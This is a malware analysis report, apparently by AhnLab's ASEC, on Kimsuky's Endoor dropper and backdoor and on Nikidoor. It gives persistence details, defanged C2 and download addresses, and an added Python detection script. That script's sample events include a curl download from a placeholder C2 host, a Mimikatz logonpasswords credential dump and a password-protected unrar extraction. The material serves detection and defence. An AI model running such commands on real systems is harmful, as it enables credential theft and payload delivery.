Malicious code disguised as installation files of domestic public institutions (Kimsuky group)

AhnLab SEcurity intelligence Center (ASEC) recently confirmed that the Kimsuky group distributed malware disguised as an installer for a domestic public institution. The malware in question is a dropper that creates Endoor, the backdoor used in the attack discussed in the past article “TrollAgent (Kimsuky group) infected during security program installation” [1].

Although the dropper itself has not been confirmed in an actual attack, attacks using the backdoor it creates were confirmed at around the same time the dropper was collected. The attackers used the backdoor to download additional malware and to install malware that steals screenshots. Endoor continues to be used in attacks and has previously appeared together with Nikidoor, which is distributed through spear-phishing attacks.

1. Dropper disguised as an installation file for a domestic public institution

The dropper malware was disguised as an installation file for a specific public institution in Korea. Its icon is the logo of that institution, and related keywords appear in the version information and on the installation page. For reference, since no legitimate program with the same version information could be found, the program may not impersonate an existing product but simply be made to look like a normal one. Also, during the actual installation process nothing legitimate is installed; only the malicious code is.

Figure 1. Disguised as a specific domestic construction-related program

The dropper is characterized not only by its disguised version information but also by being signed with a valid certificate from a domestic company. When executed, the dropper drops an embedded archive, “src.rar”, and the WinRAR command-line extractor “unrar.exe”. It then runs unrar.exe with the password “1q2w3e4r” to extract the archive, which produces the backdoor, and executes it.

Figure 2. Dropper’s process tree


2. Endoor backdoor

The dropper executes the backdoor with “install” as its argument. When run with that argument, the backdoor copies itself to “%USERPROFILE%\svchost.exe” and registers itself in the task scheduler under the name “Windows Backup.” The scheduled task executes the backdoor with the “backup” argument; in that mode the backdoor connects to the C&C server and receives commands.

The backdoor was developed in the Go language and, although obfuscated, is the same type identified in the previous case. In the past post “TrollAgent (Kimsuky group) infected during security program installation”, it was signed and distributed with the same certificate as TrollAgent. Because it also contains the following keywords, it is classified as Endoor here.

Figure 3. Endoor backdoor developed in Go language – past version

Endoor is a backdoor that transmits basic information about the infected system and supports functions such as command execution, file upload and download, process operations, and a Socks5 proxy. QiAnXin’s Threat Intelligence Center in China did not classify the malware under a separate name but did publish a detailed analysis. [2]

3. Attack Case #1

Although it is not confirmed whether it was installed through the dropper discussed above or through another path, Endoor’s use in actual attacks has been confirmed in the ASD infrastructure. The following log is believed to show the Kimsuky group updating Endoor with a different binary: a file named “rdpclip.dat” was downloaded externally using Curl. The file itself was not obtained, but the “install” argument used at execution and the file size suggest that it is a different version of Endoor.

Figure 4. Endoor download log using Curl – estimation

The attacker also installed and used Mimikatz at the “%ALLUSERSPROFILE%\cache.exe” path; the “sekurlsa::logonpasswords” argument was confirmed in the execution log as follows.

Figure 5. Stealing credential information from an infected system using Mimikatz
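As an added defender-side example (not code from the original post), the following Python rules flag the behaviours described in sections 1 to 3 when run over constructed process-creation events: unrar.exe invoked with an inline password, svchost.exe executing outside the Windows system directories with Endoor’s “install”/“backup” arguments, a curl.exe download of a .dat file, and the Mimikatz sekurlsa::logonpasswords command. The event format, file paths, user name, dropped file name and C2 placeholder are assumptions made for this example.

```python
"""Toy detection rules for the Endoor dropper/backdoor behaviours described above."""
import re

# Constructed sample process-creation events ("<parent> -> <image> <arguments>");
# paths, user name, the dropped backdoor name and the C2 placeholder are made up.
SAMPLE_EVENTS = [
    r"C:\Users\u\Downloads\App.exe -> C:\Users\u\AppData\Local\Temp\unrar.exe x -p1q2w3e4r src.rar",
    r"C:\Users\u\Downloads\App.exe -> C:\Users\u\AppData\Local\Temp\svchost.exe install",
    r"C:\Windows\System32\svchost.exe -> C:\Users\u\svchost.exe backup",  # scheduled task launch
    r"C:\Users\u\svchost.exe -> C:\Windows\System32\curl.exe -o rdpclip.dat http://C2-PLACEHOLDER/rdpclip.dat",
    r"C:\Users\u\svchost.exe -> C:\ProgramData\cache.exe sekurlsa::logonpasswords exit",
    r"C:\Windows\System32\services.exe -> C:\Windows\System32\svchost.exe -k netsvcs -p",  # benign
    r"C:\Windows\explorer.exe -> C:\Program Files\WinRAR\WinRAR.exe x report.rar",  # benign
]

EVENT_RE = re.compile(r"^(?P<parent>.+?\.exe) -> (?P<image>.+?\.exe)\s*(?P<args>.*)$", re.IGNORECASE)
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


def parse_event(line):
    """Split one event line into parent, image and argument string (None if malformed)."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def match_rules(line):
    """Return the names of the rules a single event line triggers, in a fixed order."""
    ev = parse_event(line)
    if ev is None:
        return []
    image, args = ev["image"].lower(), ev["args"].lower()
    hits = []
    # Dropper: console unrar.exe run with an inline -p<password> switch.
    if image.endswith("\\unrar.exe") and re.search(r"(^|\s)-p\S+", args):
        hits.append("unrar_inline_password")
    # Backdoor: svchost.exe running from anywhere except the Windows system directories.
    if image.endswith("\\svchost.exe") and not any(d in image for d in SYSTEM_DIRS):
        hits.append("svchost_outside_system_dir")
        # Endoor's install/backup arguments (the real svchost.exe uses -k <group> instead).
        if args.strip() in ("install", "backup"):
            hits.append("endoor_install_or_backup_arg")
    # Follow-on download: curl.exe writing a .dat file (rdpclip.dat in the case above).
    if image.endswith("\\curl.exe") and re.search(r"\b\S+\.dat\b", args):
        hits.append("curl_dat_download")
    # Credential theft: Mimikatz sekurlsa::logonpasswords regardless of the binary's name.
    if "sekurlsa::logonpasswords" in args:
        hits.append("mimikatz_logonpasswords")
    return hits


def scan(lines):
    """Map the index of each triggering event to its rule names; benign events are omitted."""
    return {i: hits for i, line in enumerate(lines) if (hits := match_rules(line))}
```

The path check deliberately ignores the binary's own name for the Mimikatz rule, since the sample above was renamed to cache.exe.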

Among the installed malware there is also a program that captures screenshots of the infected system and steals them. It was built with Kbinani’s screenshot library [3], and the attacker added code that not only captures screenshots but also exfiltrates them. The exfiltration address is the local host, “hxxp://127.0.0.1:8080/recv”, which suggests the attacker had already installed a proxy on the infected system and used it to relay the stolen data externally.

Figure 6. Source code information of screenshot stealing malware

4. Attack Case #2 (Nikidoor)

The recently confirmed Endoor sample is characterized by using Ngrok’s free domain “ngrok-free[.]app” as its C&C server. After the case above, confirmed in February 2024, an additional Endoor sample confirmed in March 2024 also used the same “install” and “backup” arguments and “ngrok-free[.]app” as its C&C server.

Figure 7. Endoor’s C&C communication packet

For reference, the same address was also used to distribute Nikidoor, and the two share a C&C server address. Nikidoor is a Kimsuky group backdoor mentioned in the post “Kimsuky targets domestic research institutes by disguising import declarations” [4]. Like other malware such as AppleSeed and Endoor, it steals information from the infected system and receives commands to perform malicious actions. A distinctive feature is that the string “Niki” is consistently used in its PDB path.

  • PDB path : C:\Users\niki\Downloads\Troy\Dll.._Bin\Dll.pdb

5. Conclusion

Recently, cases of the Kimsuky group signing and distributing malware using valid certificates from domestic companies have been continuously confirmed. The attacker ultimately installs backdoor malware and can use it to steal user information existing in the infected system.

Users should update V3 to the latest version to prevent malware infection in advance.

File Diagnostics
– Dropper/Win.Endoor.C5593202 (2024.02.25.01)
– Backdoor/Win.Endoor.C5593201 (2024.02.25.01)
– Backdoor/Win.KimGoBack.C5385331 (2024.02.20.03)
– Backdoor/Win.Endoor.C5598434 (2024.03.09.00)
– Backdoor/Win.Nikidoor.C5598774 (2024.03.10.00)

Behavioral Diagnosis
– Execution/MDP.Event.M18

IoC
MD5

– b74efd8470206a20175d723c14c2e872 : Dropper – Signed with normal certificate (*App.exe)
– 7034268d1c52539ea0cd48fd33ae43c4 : Endoor (svchost.exe)
– f03618281092b02589bca833f674e8a0 : Screenshot hijacking (ag.dat)
– b8ffb0b5bc3c66b7f1b0ec5cc4aadafc: Endoor – Additional confirmation (eng.db)
– 7beaf468765b2f1f346d43115c894d4b: Nikidoor (c.pdf)

C&C Address
– hxxps://real-joey-nicely.ngrok-free[.]app/mir/index.php : Endoor
– hxxps://fitting-discrete-lemur.ngrok-free[.]app/minish/index.php : Endoor – Additional Verification
– hxxp://minish.wiki[.]gd/index.php : Endoor – Additional Verification, Nikidoor
– hxxp://minish.wiki[.]gd/upload.php : Nikidoor

Download address
– hxxp://210.16.120[.]210/rdpclip.dat : Endoor estimated download
– hxxp://minish.wiki[.]gd/eng.db : Endoor – additional confirmation
– hxxp://minish.wiki[.]gd/c.pdf : Nikidoor